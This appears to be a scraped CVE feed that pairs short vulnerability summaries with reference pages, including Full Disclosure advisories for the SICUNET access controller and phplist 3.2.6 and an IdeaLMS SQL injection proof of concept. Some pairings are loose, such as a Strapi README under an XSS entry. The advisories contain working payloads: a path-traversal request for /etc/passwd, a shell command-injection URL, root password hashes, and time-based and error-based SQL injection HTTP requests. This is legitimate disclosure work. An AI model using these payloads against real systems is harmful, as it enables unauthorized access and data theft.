SQL Injection in GitHub repository francoisjacquet/rosariosis prior to 9.0.

@@ -53,6 +53,7 @@ Changes in 9.0 \- Add AttrEscape() function in Inputs.php \- Use AttrEscape() instead of htmlspecialchars(), program wide \- Maintain Advanced search when editing Timeframe in Percent.php \- Fix SQL injection escape DB identifier in RegistrationSave.fnc.php, Calendar.php, MarkingPeriods.php, SchoolFields.php, AddressFields.php, PeopleFields.php, StudentFields.php & UserFields.php  
Changes in 8.9.4 \----------------

CVE-2022-2067: Fix SQL injection escape DB identifier · francoisjacquet/rosariosis@15d5e87

A vulnerability has been found in Navetti PricePoint 4.6.0.0 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection (Blind). The attack can be launched remotely. Upgrading to version 4.7.0.0 is able to address this issue. It is recommended to upgrade the affected component.

CVE-2017-20042

Cross-site scripting vulnerability exists in WP Statistics versions prior to 13.2.0 because it improperly processes a platform parameter. By exploiting this vulnerability, an arbitrary script may be executed on the web browser of the user who is logging in to the website using the product.

CVE-2022-27231: WP Statistics

Strapi v3.x.x versions and earlier contain a stored cross-site scripting vulnerability in file upload function. By exploiting this vulnerability, an arbitrary script may be executed on the web browser of the user who is logging in to the product with the administrative privilege.

 

**API creation made simple, secure and fast.**

The most advanced open-source headless CMS to build powerful APIs with no effort.

Try live demo

  

Strapi is a free and open-source headless CMS delivering your content anywhere you need.

*   **Keep control over your data**. With Strapi, you know where your data is stored, and you keep full control at all times.
*   **Self-hosted**. You can host and scale Strapi projects the way you want. You can choose any hosting platform you want: AWS, Render, Netlify, Heroku, a VPS, or a dedicated server. You can scale as you grow, 100% independent.
*   **Database agnostic**. Strapi works with SQL databases. You can choose the database you prefer: PostgreSQL, MySQL, MariaDB, and SQLite.
*   **Customizable**. You can quickly build your logic by fully customizing APIs, routes, or plugins to fit your needs perfectly.

**Getting Started**

Read the Getting Started tutorial or follow the steps below:

**⏳ Installation**

Install Strapi with this **Quickstart** command to create a Strapi project instantly:

*   (Use **yarn** to install the Strapi project (recommended). Install yarn with these docs.)

yarn create strapi-app my-project --quickstart

**or**

*   (Use npm/npx to install the Strapi project.)

npx create-strapi-app my-project --quickstart

This command generates a brand new project with the default features (authentication, permissions, content management, content type builder & file upload). The **Quickstart** command installs Strapi using a **SQLite** database which is used for prototyping in development.

Enjoy 🎉

**🖐 Requirements**

Complete installation requirements can be found in the documentation under Installation Requirements.

**Supported operating systems**:

*   Ubuntu LTS/Debian 9.x
*   CentOS/RHEL 8
*   macOS Mojave
*   Windows 10
*   Docker - Docker-Repo

(Please note that Strapi may work on other operating systems, but these are not tested nor officially supported at this time.)

**Node:**

*   NodeJS >= 12 <= 16
*   NPM >= 6.x

**Database:**

*   MySQL >= 5.7.8
*   MariaDB >= 10.2.7
*   PostgreSQL >= 10
*   SQLite >= 3

**We recommend always using the latest version of Strapi to start your new projects**.

**Features**

*   **Modern Admin Panel:** Elegant, entirely customizable and a fully extensible admin panel.
*   **Secure by default:** Reusable policies, CORS, CSP, P3P, Xframe, XSS, and more.
*   **Plugins Oriented:** Install the auth system, content management, custom plugins, and more, in seconds.
*   **Blazing Fast:** Built on top of Node.js, Strapi delivers amazing performance.
*   **Front-end Agnostic:** Use any front-end framework (React, Vue, Angular, etc.), mobile apps or even IoT.
*   **Powerful CLI:** Scaffold projects and APIs on the fly.
*   **SQL databases:** Works with PostgreSQL, MySQL, MariaDB, and SQLite.

**See more on our website**.

**Contributing**

Please read our Contributing Guide before submitting a Pull Request to the project.

**Community support**

For general help using Strapi, please refer to the official Strapi documentation. For additional help, you can use one of these channels to ask a question:

*   Discord (For live discussion with the Community and Strapi team)
*   GitHub (Bug reports, Contributions)
*   Community Forum (Questions and Discussions)
*   Feedback section (Roadmap, Feature requests)
*   Twitter (Get the news fast)
*   Facebook
*   YouTube Channel (Learn from Video Tutorials)

**Migration**

Follow our migration guides on the documentation to keep your projects up-to-date.

**Roadmap**

Check out our roadmap to get informed of the latest features released and the upcoming ones. You may also give us insights and vote for a specific feature.

**Documentation**

See our dedicated repository for the Strapi documentation, or view our documentation live:

*   Developer docs
*   User guide

**Try live demo**

See for yourself what's under the hood by getting access to a hosted Strapi project with sample data.

**License**

See the LICENSE file for licensing information.

CVE-2022-29894: GitHub - strapi/strapi: 🚀 Open source Node.js Headless CMS to easily build customisable APIs

In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side Template Injection, allowing for remote code execution.

CVE-2021-41749: craft-seomatic/CHANGELOG.md at develop · nystudio107/craft-seomatic

A vulnerability was found in SICUNET Access Controller 0.32-05z. It has been declared as problematic. This vulnerability affects unknown code of the component Password Storage. The manipulation leads to weak encryption. Attacking locally is a requirement.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****SICUNET Physical Access Controller - Multiple Vulnerabilities**

_From_: Andrew Griffiths <agriffiths+fd () google com>  
_Date_: Wed, 8 Mar 2017 11:17:13 -0800  

SICUNET Physical Access Controller - Multiple Vulnerabilities

-------------------------------------------------------------

Introduction

============

Multiple vulnerabilities were identified in the SICUNET Access Controller
Products. The vulnerabilities were discovered during a black box security
assessment and therefore the vulnerability list should not be considered
exhaustive.

Affected Software and Versions

==============================

Known vulnerable version is 0.32-05z. This version string was taken from
Spider.db.

CVE

===

No CVEs have been assigned.

Vulnerability Overview

======================

0. SN-01: HIGH: Outdated software

1. SN-02: HIGH: PHP include()

2. SN-03: CRITICAL: Unauthenticated remote code execution

3. SN-04: CRITICAL: Hardcoded root credentials

4. SN-05: High: Passwords stored in plaintext

Vulnerability Details

=====================

------------------------

SN-01: Outdated software

------------------------

Severity: High

A variety of software running on the device is outdated, making
exploitation of certain bugs far easier than it would be had they been
patched, or running up to date software.

 /usr/local/php\_b2/bin # ./php -v

 PHP 5.2.14 (cli) (built: Jul  8 2012 22:45:11)

 Copyright (c) 1997-2010 The PHP Group

 Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

http://php.net/eol.php has more information about PHP 5.2 being End Of
Life, and associated security issues.

 /usr/local/lighttpd/sbin # ./arm-linux-lighttpd -v

 lighttpd/1.4.30 (ssl) - a light and fast webserver

 Build-Date: Dec 26 2013 15:13:53

https://www.lighttpd.net/download/ has more information about security
changes in lighttpd.

 # uname -a
 Linux SICUNET 2.6.32.9 #72 PREEMPT Tue Feb 28 15:25:12 KST 2012 armv7l
 GNU/Linux


It is recommended that software is kept up to date, and that configurations
are reviewed to ensure that they’re secure. For example, there may have
been configuration options for PHP which may have made exploitation harder.

--------------------

SN-02: PHP include()

--------------------

Severity: High

When sending a request to /, the 'c' parameter is used as part of an
include() statement.

Excerpt from /spider/web/webroot/index.php:

 $class  = Input::get('c', 'layout');
 $method = Input::get('m', 'index');

 include APP\_DIR.'/controllers/'.$class.EXT;

(where EXT is defined as '.php’).

By crafting the c parameter, it’s possible to access arbitrary files on the
device:

 wget 'http://victim.ip.address/?c=../../../../../etc/passwd%00&apos;

The %00 trick is a known issue, and is addressed in a later PHP update. For
more information, please see SN-01.

It is recommended that the code be refactored to not require passing user
supplied input to the include() function. Alternatively, a strict whitelist
approach of known modules may be used instead.

--------------------------------------------

SN-03: Unauthenticated remote code execution

--------------------------------------------

Severity: Critical

A variety of functionality is implemented via insecure string concatenation
then passed to underlying exec() functions:

For example, in card\_scan\_decoder.php

16     $No = $\_GET\['No'\];
17     $door = $\_GET\['door'\];
18
19     $result = array();
20
21     $db   = new PDO('sqlite:/tmp/SpiderDB/Spider.db');
<snip>

27
28     if ($No < 1)
29     {
30         $DelTemp = $db->prepare("DELETE FROM CardRawData");
31         $DelTemp->execute();
32
33         exec("/spider/sicu/spider-cgi getrawdata ".$door." on");
34     }

This vulnerability can be exploited by:

 wget 'http://victim.ip.address/card\_scan\_decoder.php?No=0&door=$(sleep 3)’

This is just an example of the pattern of insecurely creating strings to be
executed, and not an exhaustive listing.

It is recommended that injection-proof API's are used instead of
error-prone string concatenation, or whitelist / blacklist being used (for
example, escapeshellcmd). However, it appears as if the closest option in
PHP is http://php.net/manual/en/function.pcntl-exec.php which requires the
user to perform a lot more work to avoid shooting themselves in the foot
(such as forking the process first).

---------------------------------

SN-04: Hardcoded root credentials

---------------------------------

Severity: Critical

There are 3 password fingerprints in /etc/passwd

 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
 e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux
User,,,:/home/e3user:/bin/sh
 lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux
User,,,:/home/lighttpd:/bin/sh

The plaintext root password can be found in /spider/sicu binaries. The root
password may be used for the ftp or telnet service on the device. From our
observation, it appears as if FTP is running by default, along with the
ability to login as root via FTP.

The hardcoded root credentials are used by binaries on the system to run
commands as root. It is currently unknown what the purpose of the e3user
and lighttpd hardcoded passwords are.

For example, the root password is used in a variety of ways in the
following format:

 echo %s | su -c 'mkdir -p %s >& /tmp/message'
 echo %s | su -c 'chown %s %s >& /tmp/message'

Where %s is replaced at run time with the cleartext root password before
being passed to the system() function.

It is recommended that hardcoded credentials be removed, and instead
replaced with a more suitable mechanism. For example; sudo may be suitable,
combined with the NOPASSWD directive.

FTP access should be replaced with a more secure transfer mechanism (such
as SSH FTP, or SCP), and authentication should be managed by a user
(preferably via SSH public keys).

------------------------------------------

SN-05: Passwords stored in plaintext

------------------------------------------

Severity: High

A variety of credentials (for example, used for accessing the web front
end, or other devices part of the installation) are stored unencrypted on
the device in /tmp/SpiderDB/Spider.db:

sqlite> SELECT Name,Password FROM WebUser;
admin|ExamplePlaintextPassword
sqlite> SELECT Name,ID,Password FROM Controller;
Server|username|AnotherPlaintextPassword

It is recommended that where passwords must be stored, that they are
suitably cryptographically hashed using an appropriate standard (for more
information, please see https://password-hashing.net).

Author

======

The vulnerabilities were discovered by Andrew Griffiths from Google
Security Team.

Timeline

========

2016/12/06 - Contacted sicunet.com domain registrar, and sales () sicunet com
            for a point of contact to report security issues.

2016/12/08 - Pinged earlier email for a point of contact, additionally
            included tech () sicunet com on an email.

2016/12/08 - Report sent to Ike Huh, CEO.

2016/12/12 - Mentioned that reviewing spider-api would be worthwhile as it
            listens on port 7000, and strings suggests that there may be
            command injection / other vulnerabilities. No reply.

2017/01/17 - Asked point of contact if they had any questions about the
            advisory sent earlier. No reply.

2017/01/24 - Pinged vendor again, asked about resellers who may be able to
            make recommendations about restricting network access to the
            devices from the internet.

2017/01/30 - No contact from vendor.

2017/02/24 - Asked vendor if the affected users can expect patches. No
            reply.

2017/03/01 - Sent an email to the vendor, reminding them disclosure is
coming
            up soon.

2017/03/08 - 90 day disclosure deadline.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SICUNET Physical Access Controller - Multiple Vulnerabilities** _Andrew Griffiths (Mar 10)_

CVE-2017-20040: Full Disclosure: SICUNET Physical Access Controller

dynamicMarkt <= 3.10 is affected by SQL injection in the parent parameter of index.php.

**Bastian Groth Internet Service**

{{commentsTotalLength}} KommentarKommentare

Hersteller:

Zur Website

Preis:

349 EUR

Lizenz:

Kostenpflichtig

Betriebssystem:

Linux

Download-Größe:

5120 KByte

Downloadrang:

27274

Datensatz zuletzt aktualisiert:

07.06.2018

_Alle Angaben ohne Gewähr_

  

Shop-Software für Festpreis-, Auktions- und Kleinanzeigen-Markt; der Online-Marktplatz unterstützt Deutsch und Englisch, bietet individuelle Kategorien sowie Layouts und erlaubt Nutzern, sich alle Angebote eines Verkäufers anzusehen

**dynamicMarkt 3.10 - Marktplatz Software**

()

**Das könnte dich auch interessieren**

CVE-2021-41754: dynamicMarkt 3.10 - Marktplatz Software

IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.15.0 could allow a remote attacker to view product configuration information stored in PostgreSQL, which could be used in further attacks against the system.  IBM X-Force ID:  228219.

CVE-2022-31769: IBM Spectrum Copy Data Management information disclosure CVE-2022-31769 Vulnerability Report

IdeaLMS 2022 allows SQL injection via the IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID= pathname.

Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)

Vendor of Product: Ideaco.ir

Affected Product Code Base: IdeaLMS

Product Version: 2022

Description: IdeaLMS allows SQL Injection via the ClassID parameter

Attack Vectors: Attacker should inject malicious payload into ClassID parameter

Attack Type: Remote

Payload: -1%20waitfor%20delay'0%3a0%3a20'--

Assigned CVE-ID: <TBD>

Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1\. Browse the following page: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=6

2\. Insert the malicious query as the value in ClassID parameter

Example: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay'0%3a0%3a20'--

#PoC

GET /IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay'0%3a0%3a20'-- HTTP/1.1

Host: <address in which IdeaLMS is set up>

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

CVE-2022-31788: SQL Injection Vulnerability PoC #1 - IdeaLMS

A vulnerability was found in PHPList 3.2.6. It has been rated as critical. Affected by this issue is some unknown functionality of the component Subscription. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: "Curesec Research Team (CRT)" <crt () curesec com>  
_Date_: Fri, 17 Mar 2017 09:42:51 +0100  

Security Advisory - Curesec Research Team

1. Introduction

Affected        phplist 3.2.6
Product:
Fixed in:       3.3.1
Fixed Version   https://sourceforge.net/projects/phplist/files/phplist/3.3.1/
Link:           phplist-3.3.1.zip/download
Vendor Website: https://www.phplist.org/
Vulnerability   SQL Injection
Type:
Remote          Yes
Exploitable:
Reported to     01/10/2017
vendor:
Disclosed to    02/20/2017
public:
Release mode:   Coordinated Release
CVE:            n/a (not requested)
Credits         Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version
3.2.6, it is vulnerable to SQL injection.

The application contains two SQL injections, one of which is in the
administration area and one which requires no credentials. Additionally, at
least one query is not properly protected against injections. Furthermore, a
query in the administration area discloses some information on the password
hashes of users.

3. Details

SQL Injection 1: Edit Subscription

CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

It is possible for an unauthenticated user to perform an SQL injection when
updating the subscription information of an already subscribed user.

The protection against SQL injection relies on a combination of a custom magic
quotes function which applies addslashes to all input values and a function
which applies htmlspecialchars to all inputs. Additionally, some input values
are cast to integers to prevent injections. addslashes protects against
injections into arguments which are placed into single quotes, while
htmlspecialchars protects against injections into double quotes.

It should be noted that neither addslashes nor htmlspecialchars are recommended
to prevent SQL Injection.

The update functionality is vulnerable to SQL Injection as it uses the key of
POST data, while only values of POST data are escaped via addslashes, but not
keys.

Proof of Concept:

POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=
foo%40example.com HTTP/1.1 Host: localhost Connection: close Content-Length:
209 email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2
or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&
VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27

The proof of concept is chosen for simplicity and will only work if error
messages are displayed to the user. If this is not the case, other techniques
can be used to extract data from the database.

Code:

/lists/admin/subscribelib2.php $lists = ''; if (is\_array($\_POST\['list'\])) {
while (list($key, $val) = each($\_POST\['list'\])) { if ($val == 'signup') {
$result = Sql\_query("replace into {$GLOBALS\['tables'\]\['listuser'\]}
(userid,listid,entered) values($userid,$key,now())"); # $lists .= " \* ".$\_POST
\["listname"\]\[$key\]."\\n"; } } }

SQL Injection 2: Sending Campaign (Admin)

CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

When sending a campaign, the sendformat parameter is vulnerable to SQL
injection. The injection takes place into an UPDATE, so the easiest way to
extract data is via error based SQL injection.

An account with the right to send campaigns is required to exploit this issue.

Proof of Concept:

POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1 Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12 Connection: close Content-Length:
323 formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround\_fck\_bug=1&followupto=
http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling
&htmlformatted=auto&sendformat=HTML" or extractvalue(1,version()) -- - &id=2&
status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=

Code:

// /lists/admin/send\_core.php:198 $result = Sql\_Query( sprintf('update %s set
subject = "%s", fromfield = "%s", tofield = "%s", replyto ="%s", embargo =
"%s", repeatinterval = "%s", repeatuntil = "%s", message = "%s", textmessage =
"%s", footer = "%s", status = "%s", htmlformatted = "%s", sendformat = "%s",
template = "%s" where id = %d', $tables\['message'\], sql\_escape(strip\_tags
($messagedata\['campaigntitle'\])), /\* we store the title in the subject field.
Better would be to rename the DB column, but this will do for now \*/ sql\_escape
($messagedata\['fromfield'\]), sql\_escape($messagedata\['tofield'\]), sql\_escape
($messagedata\['replyto'\]), sprintf('d-d-d d:d', $messagedata\['embargo'\]
\['year'\], $messagedata\['embargo'\]\['month'\], $messagedata\['embargo'\]\['day'\],
$messagedata\['embargo'\]\['hour'\], $messagedata\['embargo'\]\['minute'\]),
$messagedata\['repeatinterval'\], sprintf('d-d-d d:d', $messagedata
\['repeatuntil'\]\['year'\], $messagedata\['repeatuntil'\]\['month'\], $messagedata
\['repeatuntil'\]\['day'\], $messagedata\['repeatuntil'\]\['hour'\], $messagedata
\['repeatuntil'\]\['minute'\]), sql\_escape($messagedata\['message'\]), sql\_escape
($messagedata\['textmessage'\]), sql\_escape($messagedata\['footer'\]), sql\_escape
($messagedata\['status'\]), $htmlformatted ? '1' : '0', $messagedata
\['sendformat'\], sql\_escape($messagedata\['template'\]), $id ) );

Sort By: Password (Admin)

CVSS: Low 2.2 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N

When viewing users, the sortby parameter can be used to sort the list. The drop
down list allows sorting by email, dates, and so on. All non-word characters
are removed, but there are no further checks.

It is possible to gather some information on the password of users via this
parameter, as it is possible to set it to sort by password.

By repeatedly changing the password of an existing user, the characters of a
password hash could be bruteforced by looking at the position of the user the
attacker controls.

An account with the right to view users is required to exploit this issue.

Proof of Concept:

http://localhost//lists/admin/?page=users&start=0&find=&findby=&sortby=password
&sortorder=desc&change=Go&id=0&find=&findby=email

Insufficient Protection against SQL Injection

CVSS: n/a

When subscribing a user, metadata is saved in the database. When saving this
data in the database, it is neither properly escaped nor are prepared
statements used, but the input is HTML encoded.

Because of this, an unauthenticated user has control over part of the query.

This issue is not currently exploitable, but may be exploitable if changes are
made to the query. The approach of HTML encoding instead of using prepared
statements to defend against SQL injection is also more error prone and may
result in further queries which are vulnerable.

A user can create a database error with the following request:

POST /lists/index.php?p=subscribe&id=a\\ HTTP/1.1 Host: localhost Cookie:
PHPSESSID=8h5fh18cqe41a2l1t6224tf9v4 Connection: close formtoken=
5bf7774ff0f2e396081dc1478cd92201&makeconfirmed=0&email=foo%40example.com&
emailconfirm=foo%40example.com&textemail=1&list%5B2%5D=signup&listname%5B2%5D=
newsletter&VerificationCodeX=&subscribe=
Subscribe+to+the+selected+newsletters%27

The resulting query is:

insert into phplist\_user\_user\_history
(ip,userid,date,summary,detail,systeminfo) values("127.0.0.1",2,now
(),"Re-Subscription","\[...\]"," HTTP\_USER\_AGENT = \[...\] REQUEST\_URI = /lists/
index.php?p=subscribe&amp;id=a\\")

It can be seen that the slash in the request escapes the quote of the query
which causes an error.

4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:

https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/
download

Please note that a newer version might already be available.

5. Report Timeline

01/10/2017 Informed Vendor about Issue
01/16/2017 Vendor confirms
02/15/2017 Asked Vendor to confirm that new release fixes issues
02/15/2017 Vendor confirms
02/20/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/phplist-326-SQL-Injection-193.html
 
--
blog: https://www.curesec.com/blog
Atom Feed: https://www.curesec.com/blog/feed.xml
RSS Feed: https://www.curesec.com/blog/rss.xml
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **phplist 3.2.6: SQL Injection** _Curesec Research Team (CRT) (Mar 17)_

Tag

#sql